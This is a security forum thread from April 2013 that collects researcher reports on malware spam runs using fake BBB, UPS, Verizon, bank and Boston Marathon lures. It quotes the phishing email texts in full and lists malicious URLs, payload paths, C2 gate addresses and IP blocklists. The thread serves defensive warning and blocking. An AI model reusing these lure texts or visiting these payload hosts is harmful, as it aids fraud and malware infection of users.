- Malware can control your machine and handle your machine as desired, affecting confidentiality, integrity, availability, traceability and non repudiation of your information. Avoid performing actions that could materialize such risks like dealing with p2p software."
___
Malware sites to block 10/4/13
- http://blog.dynamoo.com/2013/04/malware-sites-to-block-10413.html
10 April 2013 - "These domains and IPs are associated with the Amerika gang and are related to this spam run*. Blocking them would be prudent.
46.4.150.96/27
46.161.0.235
93.170.130.241 ..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/04/icann-thanks-for-malware-spam.html
___
Fake credit line SPAM / judianko .ru
- http://blog.dynamoo.com/2013/04/your-credit-line-percent-was-changed.html
10 April 2013 - "I haven't seen this one before. It leads to malware on judianko.ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 10 April 2013 14:24
Subject: Re: Your credit line percent was changed.
We apologize, but we must raise percent of your credit line up to 22,5%. We would be like to make it lower, but the situation on the market today is not so good, because of it we can not handle other way.
Under this link you can view a details about changing of contract
The link goes through a legitimate but hacked site to [donotclick]judianko .ru:8080/forum/links/column.php (report here*) hosted on:
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
185.5.185.129
188.65.178.27 ..."
* http://urlquery.net/report.php?id=1915010
... Detected suspicious URL pattern... Blackholev2 redirection successful 188.65.178.27
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5ce6a9a2c40a0811d9113a3f23176d8f/tumblr_inline_ml1pmu79cq1qz4rgp.png
___
Fake BBB SPAM / jamiliean .ru
- http://blog.dynamoo.com/2013/04/bbb-spam-jamilieanru.html
10 April 2013 - "This fake BBB spam leads to malware on jamiliean .ru:
From: Habbo Hotel [mailto:auto-contact @habbo .com]
Sent: 10 April 2013 00:17
Subject: Re: Better Business Bureau Complaint
Good afternoon,
Here with the Better Business Bureau would like to inform you that we have received a complaint (ID 24941954)
from a customer of yours in regard to their dealership with you.
Please open the COMPLAINT REPORT attached to this email (Internet Exlporer file)
to view the details on this issue and suggest us about your position as soon as possible.
We hope to hear from you shortly.
Regards,
CHRISTI REAGAN
Dispute Counselor
Better Business Bureau
There is an attachment BBB-Complaint-US39824.htm with a malicious payload is at [donotclick]jamiliean .ru:8080/forum/links/column.php. Associated payload, IPs and domains are the same as this attack* also running today."
* http://blog.dynamoo.com/2013/04/your-credit-line-percent-was-changed.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/203632be385daa25748a0225f939f786/tumblr_inline_ml1m5i6Jcz1qz4rgp.png
___
Fake Verizon Wireless SPAM / jamtientop .ru
- http://blog.dynamoo.com/2013/04/verizon-wireless-spam-jamtientopru.html
10 Apr 2013 - "This fake Verizon Wireless spam leads to malware on jamtientop .ru:
Date: Wed, 10 Apr 2013 01:14:51 +0100 [04/09/13 20:14:51 EDT]
From: DorianBottom @hotmail .com
Subject: Verizon Wireless
IMPORTANT ACCOUNT NOTE FROM VERIZON WIRELESS.
Your acknowledgment message is issued.
Your account No. ending in 1332
Dear Client
For your accommodation, your confirmation letter can be found in the Account Documentation desk of My Verizon.
Please browse your informational message for more details relating to your new transaction.
Open Information Message
In addition, in My Verizon you will find links to information about your device & services that may be helpfull if you looking for answers.
Thank you for joining us. My Verizon is laso works 24 hours 7 days a week to assist you with:
Viewing your utilization
Upgrade your tariff
Manage Account Members
Pay for your bill
And much, much more...
© 2013 Verizon Wireless
Verizon Wireless | One Verizon Way Mail Code: 113WVC | Basking Ridge, MI 87325
We respect your privacy. Please browse our policy for more information
The link goes to a hacked legitimate site to a malicious landing page at [donotclick]jamtientop.ru:8080/forum/links/column.php (report here*) hosted on:
91.191.170.26 (Netdirekt, Turkey)
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
91.191.170.26
185.5.185.129
188.65.178.27 ..."
* http://urlquery.net/report.php?id=1919123
... Detected suspicious URL pattern... Blackholev2 redirection 185.5.185.129
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/418106bda1e1f92a9c472a6c7c285d32/tumblr_inline_ml3gtfQaTS1qz4rgp.png
:mad: :fear:
AplusWebMaster
2013-04-11, 19:15
FYI...
Fake Changelog SPAM / juliaroberzs .ru
- http://blog.dynamoo.com/2013/04/changelog-spam-juliaroberzsru.html
11 Apr 2013 - "This spam leads to malware on juliaroberzs .ru:
Date: Thu, 11 Apr 2013 02:46:13 +0100
From: Mayola Phipps via LinkedIn [member@linkedin.com]
Subject: Re: changelog UPD.
Attachments: changelog.htm
Good morning,
as promised changelog is attached (Internet Explorer format)
The attachment changelog.htm leads to a malicious landing page at [donotclick]juliaroberzs .ru:8080/forum/links/column.php (report here*) hosted on some familiar IPs**:
91.191.170.26 (Netdirekt, Turkey)
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
91.191.170.26
185.5.185.129
188.65.178.27 ..."
* http://urlquery.net/report.php?id=1927055
... Detected suspicious URL pattern... Blackhole 2 Landing Page
** http://blog.dynamoo.com/2013/04/verizon-wireless-spam-jamtientopru.html
___
Malicious Xanga Spam
- http://threattrack.tumblr.com/post/47700390846/malicious-xanga-spam
11 Apr 2013 - "Subjects Seen:
Gracelyn [removed] is your new friend!
Typical e-mail details:
Hey [removed]!
Now that you are friends with Gracelyn, you can:
• Share a memory of Gracelyn
• Post on Gracelyn’s Chatboard
• More…
Have fun!
The Xanga Team
Malicious URLs
degsme .lv/settingss.htm
janasika .ru:8080/forum/links/column.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ab250b773de94e71af31ae181eb2bc4f/tumblr_inline_ml3g59LAQw1qz4rgp.png
___
Fake UPS SPAM / juliamanako .ru
- http://blog.dynamoo.com/2013/04/ups-spam-juliamanakoru.html
11 Apr 2013 - "This fake UPS spam leads to malware on juliamanako .ru:
Date: Thu, 11 Apr 2013 11:58:33 -0300 [10:58:33 EDT]
From: Aida Tackett via LinkedIn [member@linkedin.com]
Subject: United Postal Service Tracking Nr. H9544862721
Your USPS CUSTOMER SERVICES for big savings! Can't see images? CLICK HERE.
UPS - UPS Customer Services
UPS UPS SUPPORT 56
UPS - UPS MANAGER 67 >> UPS - UPS SUPPORT 501
Already Have an Account?
Enjoy all UPS has to offer by linking your My UPS profile to your account.
Link Your Account Now >>
UPS - UPS Customer Services
Good day, [redacted].
DEAR CONSUMER , We were not able to delivery the postal package
Track your Shipment now!
Pack it. Ship ip. No calculating , UPS .com Customer Services.
Shipping Tracking Calculate Time & Cost Open an Account
@ 2011 United Parcel Service of America, Inc. USPS Customer Services, the UPS brandmark, and the color brown are
trademarks of United Parcel Service of America, Inc. All rights reserved.
This is a marketing e-mail for UPS services. Click here to update your e-mail preferences or to unsubscribe to
USPS .COM marketing e-mail. For information on UPS's privacy practices, please refer to UPS Privacy Policy.
USPS Services, 04 Glenlake Parkway, NE - Atlanta, GA 30324
Attn: Customer Communications Department
The link goes through a legitimate -hacked- site to a malicious landing page at [donotclick]juliamanako .ru:8080/forum/links/column.php hosted on:
91.191.170.26 (Netdirekt, Turkey)
185.5.185.129 (Far-Galaxy Networks, Germany)
188.65.178.27 (Melbourne Server Hosting, UK)
Blocklist:
91.191.170.26
185.5.185.129
188.65.178.27 ..."
___
Malicious QuickBooks Overdue Payment SPAM
- http://threattrack.tumblr.com/post/47715184510/malicious-quickbooks-overdue-payment-spam
April 11, 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 04/11/2013 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Rusty Coffey
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ab54fe807059c2f52bc1f44fce1a6a14/tumblr_inline_ml3tavRi9P1qz4rgp.png
Also: http://security.intuit.com/alert.php?a=79
Last updated 4/11/2013
:mad::fear:
AplusWebMaster
2013-04-12, 16:47
FYI...
Fake American Airlines emails lead to malware
- http://blog.webroot.com/2013/04/12/american-airlines-you-can-download-your-ticket-themed-emails-lead-to-malware/
April 12, 2013 - "Cybercriminals are currently spamvertising tens of thousands of emails impersonating American Airlines in an attempt to trick its customers into thinking that they’ve received a download link for their E-ticket. Once they download and execute the malicious attachment, their PCs automatically join the botnet operated by the cybercriminal/gang of cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/04/american_airlines_email_spam_malware_malicious_software_social_engineering.png
... Detection rate for the malicious executable: MD5: f17ee7f9a0ec3d7577a148ae79955d6a * ... Mal/Weelsof-D..."
(Long list of malware C&C IP's available at the webroot URL above.)
* https://www.virustotal.com/en/file/cde3818cd9ca51efbee700a75e63ce19c3da364c96afe07d7ca01e66f6f7d3ac/analysis/
File name: f17ee7f9a0ec3d7577a148ae79955d6a
Detection ratio: 27/46
Analysis date: 2013-04-11
___
Chase Bank Credentials Phish
- http://threattrack.tumblr.com/post/47779166917/chase-bank-credentials-phish
April 12, 2013 - "Subjects Seen:
Chase Online: Site Maintenance Notification
Typical e-mail details:
Dear Customer:
As part of our commitment to protecting the security of your account, we routinely verify online profile details. We’re writing you to confirm your Chase account details.
Your account security is important to us, so we appreciate your prompt attention to this matter. Attached is a form to help complete this process. Download the form and follow the instructions.
We are here to assist you anytime. Your account security is our priority. Thank you for choosing Chase.
Sincerely,
Jennifer Myhre
Senior Vice President
Chase Consumer Banking
Malicious URLs
myasfalisi .gr/images/sampledata/chase.js
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/21b85811cd757088f3c853a5214191cc/tumblr_inline_ml59iz6iGe1qz4rgp.png
___
Malicious Wells Fargo Wire Transfer Spam
- http://threattrack.tumblr.com/post/47793089795/malicious-wells-fargo-wire-transfer-spam
April 12, 2013 - "Subjects Seen:
International Wire Transfer File Not Processed
Typical e-mail details:
We are unable to process your International Wire Transfer request due to insufficient funds in the identified account.
Review the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 04/12/2013 03:00 pm PT, the file may not be processed.
Please view the attached file for more details on this transaction.
Any email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557).
Event Message ID: [removed]
Date/Time Stamp: Fri, 12 Apr 2013 12:44:47 -0500
Malicious URLs
94.32.66.114 /ponyb/gate.php
116.122.158.195 :8080/ponyb/gate.php
embryo-india .com/24gwq.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/054a51efa2e81b8d7762b32ba46d501f/tumblr_inline_ml5ly6oQum1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-04-15, 17:54
FYI...
Malicious PayPal Receipt Spam
- http://threattrack.tumblr.com/post/48039323240/malicious-paypal-recipt-spam
April 15, 2013 - "Subjects Seen:
Receipt for your PayPal payment to [removed]
Typical e-mail details:
Hello,
You sent a payment of $149.49 USD to [removed] ([removed])
Thanks for using PayPal. To see all the transaction details, log in to your PayPal account.
It may take a few moments for this transaction to appear in your account.
Malicious URLs
matsum .info/wp-content/plugins/akismet/wp-status.php?1HJN2KC56FN7C
lacunanotifies .net/closest/incomming_message.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9e913cc7d9e2328a7065961ea66a607f/tumblr_inline_mlatxyS1Ce1qz4rgp.png
___
Malicious USPS Delivery Failure Spam
- http://threattrack.tumblr.com/post/48042515379/malicious-usps-delivery-failure-spam
April 15, 2013 - "Subjects Seen:
USPS delivery failure report
Typical e-mail details:
Notification
Our company’s courier couldn’t make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: [removed]
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global.
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
serw.myroitracking .com/24gwq.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8a0a0746575d9df0bef8842d39825b63/tumblr_inline_mlax8nNDsw1qz4rgp.png
___
Bank of America Credentials Phish
- http://threattrack.tumblr.com/post/48066113572/bank-of-america-credentials-phish
April 15, 2013 - "Subjects Seen:
Please confirm your information
Typical e-mail details:
We have decided to put an extra verification process to ensure your identity and your account security.
Please click here to continue the verification process and ensure your account security.
Malicious URLs
safe.bankofamerica .logon.canadapenfund.ca/ - 216.227.221.247*
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7edcf07c7af60b46d89ce413460168ff/tumblr_inline_mlbf8ctoUs1qz4rgp.png
* http://urlquery.net/report.php?id=2023194
Diagnostic page for AS15244 (ADDD2NET)
- https://www.google.com/safebrowsing/diagnostic?site=AS:15244
"Of the 23067 site(s) we tested on this network over the past 90 days, 1138 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-04-15, and the last time suspicious content was found was on 2013-04-15... Over the past 90 days, we found 173 site(s) on this network... that appeared to function as intermediaries for the infection of 516 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 157 site(s)... that infected 602 other site(s)..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake USPS Delivery Failure Notification E-mail Messages - 2013 Apr 15
Fake Tax Refund Notification E-mail Messages - 2013 Apr 15
Fake Product Quotation Document E-mail Messages - 2013 Apr 15
Fake Product Inquiry With Attached Sample Design E-mail Messages - 2013 Apr 15
Fake Portuguese Account Regularization Notification E-mail Messages - 2013 Apr 15
Fake Wire Transfer Notification E-mail Messages - 2013 Apr 15
Fake Western Union Money Compensation Notification E-mail Messages - 2013 Apr 15
Fake CashPro Online Digital Certificate Notification E-mail Messages - 2013 Apr 15
Fake Italian Malicious Link E-mail Messages - 2013 Apr 15
Fake Tax Return Submission Notification E-mail Messages - 2013 Apr 15
Fake Credentials Reset Notification E-mail - 2013 Apr 15
Fake Purchase Order Notification E-mail Messages - 2013 Apr 15
Fake Bill Notification E-mail Messages - 2013 Apr 15
Fake Document Sharing E-mail Messages - 2013 Apr 15
(Links and more detail at the cisco URL above.)
:mad::fear:
AplusWebMaster
2013-04-16, 22:59
FYI...
Fake "Fiserv Secure Email Notification" spam
- http://blog.dynamoo.com/2013/04/fiserv-secure-email-notification-spam.html
April 16, 2013 - "This spam has an encrypted ZIP file attached that contains malware. The passwords and filenames will vary.
From: Fiserv Secure Notification [mailto:secure.notificationi@fiservi.com]
Sent: Tue 16/04/2013 14:02
Subject: [WARNING : MESSAGE ENCRYPTED] Fiserv Secure Email Notification - CC3DK9WJW8IG0F5
You have received a secure message
Read your secure message by opening the attachment, Case_CC3DK9WJW8IG0F5.zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - KsUs3Z921mA
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
To access from a mobile device, forward this message to http://forums.spybot.info/misc.php?do=email_dev&email=bW9iaWxlQHJlcy5maXNlcnYuY29t to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.979.7673.
2000-2013 Fiserv Secure Systems, Inc. All rights reserved.
In the case of the sample I have seen, there is an attachment Case_CC3DK9WJW8IG0F5.zip which unzips using the supplied password to Case_Fiserv_04162013.exe (note the date is encoded into the filename).
At the time of writing, VirusTotal results are just 5/46*. The Comodo CAMAS report is here**, the ThreatExpert report here***... seems to be a Zbot variant.
The bad IPs involved are:
50.116.15.209 (Linode, US)
62.103.27.242 (OTEnet, Greece)
78.139.187.6 (Caucasus Online Ltd, Georgia)
87.106.3.129 (1&1, Germany)
108.94.154.77 (AT&T, US)
117.212.83.248 (BSNL Internet, India)
120.61.212.73 (MTNL, India)
122.165.219.71 (ABTS Tamilnadu, India)
123.237.187.126 (Reliance Communications, India)
176.73.145.22 (Caucasus Online Ltd, Georgia)
186.134.148.36 (Telefonica de Argentina, Argentina)
190.39.197.150 (CANTV Servicios, Venezuela)
195.77.194.130 (Telefonica, Spain)
199.59.157.124 (Kyvon, US)
201.211.224.46 (CANTV Servicios, Venezuela)
212.58.4.13 (Doruknet, Turkey)
Recommended blocklist:
korbi.va-techniker .de
mail.yaklasim .com
phdsurvey .org
vbzmiami .com
user1557864.sites.myregisteredsite .com
50.116.15.209
62.103.27.242
78.139.187.6
87.106.3.129
108.94.154.77
117.212.83.248
120.61.212.73
122.165.219.71
123.237.187.126
176.73.145.22
186.134.148.36
190.39.197.150
195.77.194.130
199.59.157.124
201.211.224.46
212.58.4.13 "
* https://www.virustotal.com/en/file/3143dbfbcf608abbdeb5449da38c2c5bcdb1f4873ea2c229da2e921c5b071764/analysis/1366120267/
File name: Case_Fiserv_04162013.exe
Detection ratio: 5/46
Analysis date: 2013-04-16 13:51:07 UTC
** http://camas.comodo.com/cgi-bin/submit?file=3143dbfbcf608abbdeb5449da38c2c5bcdb1f4873ea2c229da2e921c5b071764
*** http://www.threatexpert.com/report.aspx?md5=dc858edc930a76e79ce7562d7b0564f9
___
Malicious American Airlines Spam Continues
- http://threattrack.tumblr.com/post/48126962744/malicious-american-airlines-spam-continues
April 16, 2013 - "Subjects Seen:
Your order has been completed
Order #[removed]
Typical e-mail details:
Customer Notification
Your bought ticket is attached to the letter as a scan document.
To use your ticket you should Download It .
Malicious URLs
caprica-toysncomics .com/components/.a9iifi.php?request=ss00_323
caprica-toysncomics .com/components/.a9iifi.php?ticket=844_220641690
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e76f2abb145f24c92979977610248b09/tumblr_inline_mlcwasuTUq1qz4rgp.png
___
Malicious NACHA, ACH Transfer Spam
- http://threattrack.tumblr.com/post/48132294179/malicious-nacha-ach-trasnfer-spam
April 16, 2013 - "Subjects Seen:
Your ACH transfer
Typical e-mail details:
The ACH process (ID: [removed]), recently requested from your checking account (by you), was rejected by the recepient’s bank.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b8cfbc79a043326677dea1e5da2db491/tumblr_inline_mld0q6LxuS1qz4rgp.png
___
Fake Boston Marathon Scams - Update
- https://isc.sans.edu/diary.html?storyid=15617
2013-04-16
:fear: :mad:
AplusWebMaster
2013-04-17, 15:04
FYI...
Fake Boston Marathon SPAM / askmeaboutcctv .com
- http://blog.dynamoo.com/2013/04/boston-marathon-spam-askmeaboutcctvcom.html
17 April 2013 - "This pretty shameful Boston marathon themed spam leads to malware on askmeaboutcctv .com:
Sample 1:
From: Graham Jarvis [mailto:alejandro.alfonzo-larrain @tctwest .net]
Sent: 17 April 2013 09:49
Subject: Video of Explosion at the Boston Marathon 2013
hxxp:||61.63.123.44/news .html
Sample 2:
From: Sally Rasmussen [mailto:artek33 @risd .edu]
Sent: 17 April 2013 09:49
To: UK HPEA 2
Subject: Aftermath to explosion at Boston Marathon
hxxp:||190.245.177.248/news .html
(Note that the payload links have been lightly obfuscated, don't click them).
If you click the link you see a set of genuine YouTube videos. However, the last one seems blank because it is in fact a malicious IFRAME to [donotclick]askmeaboutcctv .com/wmiq.html (report here*) which appears to be on a legitimate but hacked site. The server seems to be overloaded at the moment which is a good thing I suppose.
* http://urlquery.net/report.php?id=2044081
... RedKit applet + obfuscated URL...
more sample subjects and links:
Subject: Video of Explosion at the Boston Marathon 2013
Subject: Aftermath to explosion at Boston Marathon
Subject: Explosion at Boston Marathon
Subject: Explosions at the Boston Marathon
[donotclick]46.233.4.113 /boston.html
[donotclick]37.229.92.116 /boston.html
[donotclick]188.2.164.112 /news.html
[donotclick]109.87.205.222 /news.html
I would advise blocking these IPs and domains. Be vigilant against this kind of attack, also bear in mind that the bad guys might try to exploit Margaret Thatcher's funeral and the London Marathon in the same way."
- http://blog.dynamoo.com/2013/04/websitewelcomecom-and-boston-marathon.html
17 April 2013 - "Earlier today I reported some Boston Marathon themed spam and since then I have seen more malicious landing pages on -hacked- legitimate sites as follows (don't click those links, obviously):
hxxp :||46.233.4.113 /boston.html
96.125.163.122 (WebsiteWelcome.com, US) ...
hxxp :||190.245.177.248 /news.html
184.172.168.32 (WebsiteWelcome.com, US)...
hxxp :||95.87.6.156 /boston.html
50.22.194.64 (WebsiteWelcome.com, US)...
69.56.174.178 ...
This situation has been reported to HostGator / WebsiteWelcome who are investigating..."
(More detail at the dynamoo URL above.)
Sample screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d2e8939eba0af8c7e5cc44c43c80f5d1/tumblr_inline_mlegwyVPcg1qz4rgp.png
___
KELIHOS Worm Emerges, Takes Advantage of Boston Marathon Blast
- http://blog.trendmicro.com/trendlabs-security-intelligence/kelihos-worm-emerges-takes-advantage-of-boston-marathon-blast/
April 16, 2013 11:52 pm (UTC-7) - "... a spam outbreak of more than 9,000 Blackhole Exploit Kit spammed messages, all related to the said tragedy that killed at least three people and injured many more. Some of the spammed messages used the subjects “2 Explosions at Boston Marathon,” “Aftermath to explosion at Boston Marathon,” “Boston Explosion Caught on Video,” and “Video of Explosion at the Boston Marathon 2013" to name a few. Below is a spam sample she found:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/Boston_blast_fig1.png
The spammed message only contains the URL... but once you click it, it displays a web page with an embedded video, supposedly from YouTube. At this point, users who click the link may have already downloaded malware unknowingly, aka drive-by-download attacks. Here’s a screenshot of the web page with the embedded video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/Boston_blast_fig2.png
... Aside from the spam sample discussed earlier, we also found that other platforms have also been exploited to spread similar threats. Malicious Tweets and links on free blogging platforms were also crafted just hours after the blast took place.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/Boston_blast_fig6.png
... a cybercriminal’s work is never complete. Taking advantage of newsworthy events is indeed a cybercrime staple; each new scheme always seems to vary, which results in a never-ending cycle of malicious mischief."
___
Boston Marathon bombings used to spread malware
- https://www.net-security.org/malware_news.php?id=2469
April 17, 2013 - "... the Boston Marathon bombings have become an effective lure in the hands of cyber scammers and malware peddlers. Kaspersky Lab researchers are warning about spam emails* offering nothing more than a simple link to a web page that contains URLs of non-malicious YouTube videos about the attacks. Unfortunately, after 60 seconds, another link is activated, and this one leads to a malicious executable:
> https://www.net-security.org/images/articles/boston-exe-17042013.jpg
The file offered for download is a variant of the Tepfer info-stealer Trojan, which phones home to a number of IP addresses in Ukraine, Argentina and Taiwan... don't follow links or download files delivered via unsolicited emails or messages sent via popular social media sites and IM services. You're best bet is to check out reputable news sites for information."
* https://www.securelist.com/en/blog/208194228/Boston_Aftermath
___
Fake BBB SPAM / janariamko .ru
- http://blog.dynamoo.com/2013/04/bbb-spam-janariamkoru.html
17 Apr 2013 - "After a few quiet days on the RU:8080 spam front it has started again..
Date: Wed, 17 Apr 2013 20:18:14 +0800
From: "Better Business Bureau" [guttersnipeg792 @ema1lsv100249121 .bbb.org]
Subject: Better Business Beareau accreditation Terminated 64A488W04
Case N. 64A488W04
Respective Owner/Responsive Person:
The Better Business Bureau has been filed the above said reclamation from one of your clients with reference to their business relations with you. The information about the consumer's trouble are available at the link below. Please give attention to this matter and communicate with us about your opinion as soon as possible.
We graciously ask you to visit the COMPLAINT REPORT to respond on this reclamation. Click here to be taken directly to your report today:
bbb .org/business-claims/customercare/report-65896564
If you think you got this email by mistake - please forward this message to your principal or accountant
We are looking forward to your prompt answer.
Looking for info on additional ways your BBB Accreditation can boost your business? Visit the BBB SmartGuide.
Sincerely,
Gabriel Reyes - Online Communication Specialist
bbb.org - Start With Trust
The malicious payload is at [donotclick]janariamko.ru:8080/forum/links/public_version.php (report here*) hosted on the following IPs:
91.191.170.26 (Netdirekt, Turkey)
93.187.200.250 (Netdirekt, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
91.191.170.26
93.187.200.250
208.94.108.238 ..."
* http://urlquery.net/report.php?id=2048054
... Blackholev2 redirection successful 93.187.200.250
___
Another BBB spam run / freedblacks .net
- http://blog.dynamoo.com/2013/04/bbb-spam-freedblacksnet.html
17 Apr 2013 - "Another BBB spam run today, although this time not an RU:8080 spam we saw earlier but an "Amerika" spam run instead. Interestingly, both mis-spell "Beareau" which indicates they are using the same software, even if they are different gangs. The link in the email leads to malware on freedblacks .net.
Date: Wed, 17 Apr 2013 21:20:20 +0800 [09:20:20 EDT]
From: BBB [bridegroomc @m.bbb .org]
Subject: Better Business Beareau accreditation Cancelled P5088819
Case No. P5088819
Respective Owner/Responsive Person:
The Better Business Bureau has been registered the above said claim letter from one of your users as regards their business contacts with you. The information about the consumer's worry are available for review at a link below. Please pay attention to this issue and inform us about your sight as soon as possible.
We amiably ask you to click and review the APPEAL REPORT to respond on this claim letter. Click here to be taken directly to your report today:
bbb .org/business-claims/customercare/report-02111671
If you think you recieved this email by mistake - please forward this message to your principal or accountant
We are looking forward to your prompt answer.
Looking for info on additional ways your BBB Accreditation can boost your business? Visit the BBB SmartGuide.
Sincerely,
Ian Wilson - Online Communication Specialist
bbb.org - Start With Trust
The link goes to a legitimate hacked site and then to a malicious landing page at [donotclick]freedblacks.net/news/agency_row_fixed.php (report here*) hosted on the following IPs:
65.34.160.10 (Comcast, US)
94.249.206.117 (GHOSTnet, Germany)
155.239.247.247 (Centurion Telkom, South Africa)
173.234.239.60 (Nobis Technology Group, US)
Blocklist:
65.34.160.10
94.249.206.117
155.239.247.247
173.234.239.60 ..."
* http://wepawet.iseclab.org/view.php?hash=ca4533c1d2bc83e5f065e0f11920e277&t=1366206729&type=js
___
Fake CNN .com Boston Marathon SPAM / thesecondincomee .com
- http://blog.dynamoo.com/2013/04/cnncom-boston-marathon-spam.html
17 Apr 2013 - "This Boston Marathon themed spam leads to malware on thesecondincomee .com:
Example 1:
Date: Wed, 17 Apr 2013 10:32:18 -0600 [12:32:18 EDT]
From: CNN Breaking News [BreakingNews@mail.cnn.com]
Subject: Opinion: Boston Marathon Explosions - Obama Benefits? - CNN.com
CNN.com
Powered by
* Please note, the sender's email address has not been verified.
You have received the following link from BreakingNews @mail .cnn .com:
Click the following to access the sent link:
Boston Marathon Explosions - Obama Benefits? - CNN.com*
SAVE THIS link FORWARD THIS link
Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.
*This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here
Example 2:
Date: Wed, 17 Apr 2013 22:32:56 +0600
From: behring401 @mail .cnn .com
Subject: Opinion: Boston Marathon Explosions - North Korea trail or Osama Legacy? - CNN.com
Powered by
* Please note, the sender's email address has not been verified.
You have received the following link from BreakingNews @mail .cnn .com:
Click the following to access the sent link:
Boston Marathon Explosions - North Korea trail or Osama Legacy? - CNN.com*
Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.
This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here
Screenshot: https://lh3.ggpht.com/-ZWq-ThYXI-U/UW7wV9Gnq6I/AAAAAAAABFU/51KST-M9iLs/s400/cnn-boston.png
The malicious payload is at [donotclick]thesecondincomee .com/news/agency_row_fixed.php hosted on:
94.249.206.117 (GHOSTnet, Germany)
155.239.247.247 (Centurion Telkom, South Africa)
173.234.239.60 (Nobis Technology Group, US)
The recommended blocklist is the same as used in this earlier attack*."
* http://blog.dynamoo.com/2013/04/bbb-spam-freedblacksnet.html
:mad: :mad:
AplusWebMaster
2013-04-18, 16:57
FYI...
Malicious Texas Explosion SPAM
- http://blog.dynamoo.com/2013/04/fertilizer-plant-explosion-near-waco.html
18 April 2013 - "As I suspected, this didn't take long. This spam is a retread of yesterday's Boston Marathon spam.
From: Maria Numbers [mailto:tjm7 @deco-club .ru]
Sent: 18 April 2013 11:51
To: UK HPEA 3
Subject: CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas
hxxp :||83.170.192.154 /news.html
At the moment the payload site is [donotclick]bigmovies777 .sweans .org/aoiq.html (report here* but site appears b0rked) but it seems to rotate every hour or so to a new domain. Almost all the domains I have seen are -hacked- legitimate sites hosted by WebsiteWelcome. If you click through you get five genuine embedded YouTube videos plus a malware IFRAME that looks a bit like this:
> https://lh3.ggpht.com/-9WKYbkNtVV4/UW_cpX_dQYI/AAAAAAAABFk/SBWXy4vsUHk/s400/texas-explosion.jpg
The Boston Marathon spam lead to a RedKit exploit kit, this probably does too. Given the ever-changing nature of the malware landing page, this one is rather difficult to stop. Advising your user population of the risk may be prudent.
Sample subjects:
CAUGHT ON CAMERA: Fertilizer Plant Explosion
CAUGHT ON CAMERA: Fertilizer Plant Explosion Near Waco, Texas
Raw: Texas Explosion Injures Dozens
Texas Explosion Injures Dozens..."
* http://urlquery.net/report.php?id=2061326
___
Malicious West, TX Exploison Spam
- http://threattrack.tumblr.com/post/48274886150/malicious-west-tx-exploison-spam
18 April 2013 - "Subjects Seen:
West Tx Explosion
Video footage of Texas explosion
Typical e-mail details:
182.235.147.164 /texas.html[/i]
Malicious URLs
182.235.147.164 /texas.html
78.90.133.133 /news.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f117098a739d2942bebddd798b2d3fb8/tumblr_inline_mlgc8tbBze1qz4rgp.png
___
Malicious Secure Message Spam
- http://threattrack.tumblr.com/post/48292544114/malicious-secure-message-spam
18 April 2013 - "Subjects Seen:
New Secure Message Received from [removed]
Typical e-mail details:
Greetings [removed],
You have received a new secure message from [removed].
